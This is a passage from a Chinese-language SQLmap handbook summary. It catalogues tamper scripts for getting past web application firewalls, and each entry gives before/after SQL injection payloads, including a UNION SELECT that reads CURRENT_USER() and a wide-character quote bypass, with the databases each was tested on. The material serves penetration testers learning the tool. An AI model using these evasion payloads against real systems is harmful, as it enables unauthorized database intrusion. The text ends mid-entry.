记一份SQLmap使用手册小结（一） (8)

示例：

1 AND 9227=9227 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 ``` 版本要求: * MySQL >= 5.1.13 Tested 针对此做过测试: * MySQL 5.1.41 #### space2mssqlblank.py 作用：空格替换为其它空符号 示例： ```sql SELECT id FROM users SELECT%08id%02FROM%0Fusers

版本要求:

Microsoft SQL Server 在以下版本做过测试: Microsoft SQL Server 2000 Microsoft SQL Server 2005

4:space2mysqlblank.py

作用：空格替换其它空白符号

示例：

SELECT id FROM users SELECT%0Bid%0BFROM%A0users

版本要求:

MySQL 在以下版本做过测试: MySQL 5.1

5:space2mssqlhash.py

作用：替换空格

示例：

'1 AND 9227=9227' '1%23%0AAND%23%0A9227=9227'

版本要求:

MSSQL MySQL

6:modsecurityversioned.py

作用：过滤空格，包含完整的查询版本注释

示例：

'1 AND 2>1--' '1 /*!30874AND 2>1*/--'

版本要求:

MySQL 在以下版本做过测试: MySQL 5.0

7:space2comment.py

作用：Replaces space character (‘ ‘) with comments ‘/**/’

示例：

SELECT id FROM users SELECT//id//FROM/**/users

在以下版本做过测试:

Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0

8:space2mysqldash.py

作用：用–%0A替换空格

注：之前有个mssql的 这个是mysql的

示例：

'1 AND 9227=9227' '1--%0AAND--%0A9227=9227'

版本要求:

MySQL MSSQL

9:space2plus.py

作用：用+替换空格

示例：

'SELECT id FROM users' 'SELECT+id+FROM+users'

在以下版本做过测试:

All

10:bluecoat.py

作用：代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

示例：

'SELECT id FROM users where id = 1' 'SELECT%09id FROM users where id LIKE 1'

在以下版本做过测试:

MySQL 5.1, SGOS

11:space2randomblank.py

作用：代替空格字符（“”）从一个随机的空白字符可选字符的有效集

示例：

'SELECT id FROM users' 'SELECT%0Did%0DFROM%0Ausers'

在以下版本做过测试:

All

12:sp_password.py

作用：追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

示例：

'1 AND 9227=9227-- ' '1 AND 9227=9227-- sp_password'

版本要求: * MSSQL

针对过滤引号的：

1:apostrophemask.py

作用：用utf8代替单引号

示例：

"1 AND '1'='1" '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

在以下版本做过测试:

all

2:apostrophenullencode.py

作用：绕过过滤双引号，替换字符和双引号。

示例：

"1 AND '1'='1" '1 AND %00%271%00%27=%00%271'

在以下版本做过测试:

MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0 针对过滤关键字的：

1:halfversionedmorekeywords.py

作用：当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论

示例：

("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

版本要求:

MySQL < 5.1 在以下版本做过测试: MySQL 4.0.18, 5.0.22

2:ifnull2ifisnull.py

作用：绕过对IFNULL过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

示例：

'IFNULL(1, 2)' 'IF(ISNULL(1),2,1)'

版本要求:

MySQL SQLite (possibly) SAP MaxDB (possibly) 在以下版本做过测试: MySQL 5.0 and 5.5

3:multiplespaces.py

作用：围绕SQL关键字添加多个空格

示例：

'1 UNION SELECT foobar' '1 UNION SELECT foobar'

在以下版本做过测试:

All

4:halfversionedmorekeywords.py

作用：关键字前加注释

示例：

value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

版本要求:

MySQL < 5.1 在以下版本做过测试: MySQL 4.0.18, 5.0.22

5:unionalltounion.py

作用：替换UNION ALL SELECT UNION SELECT

示例：

'-1 UNION ALL SELECT' '-1 UNION SELECT'

版本要求: all

6:randomcomments.py

作用：用/**/分割sql关键字

‘INSERT’ ‘IN//S//ERT’

7:unmagicquotes.py

作用：宽字符绕过 GPC addslashes

示例：

1’ AND 1=1 1%bf%27 AND 1=1–%20 8:randomcase.py

作用：随机大小写

示例：
INSERT
InsERt
在以下版本做过测试:

Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0 针对过滤比较符号的：

1:equaltolike.py

作用：like 代替等号

示例：

SELECT * FROM users WHERE id=1 SELECT * FROM users WHERE id LIKE 1

2:greatest.py

作用：绕过过滤’>’ ,用GREATEST替换大于号。

示例：

'1 AND A > B' '1 AND GREATEST(A,B+1)=A'

在以下版本做过测试:

MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0

3:between.py

作用：用between替换大于号（>）

示例：

'1 AND A > B--' '1 AND A NOT BETWEEN 0 AND B--'

在以下版本做过测试:

Microsoft SQL Server 2005 MySQL 4, 5.0 and 5.5 Oracle 10g PostgreSQL 8.3, 8.4, 9.0 其他类型：

1:versionedmorekeywords.py

作用：注释绕过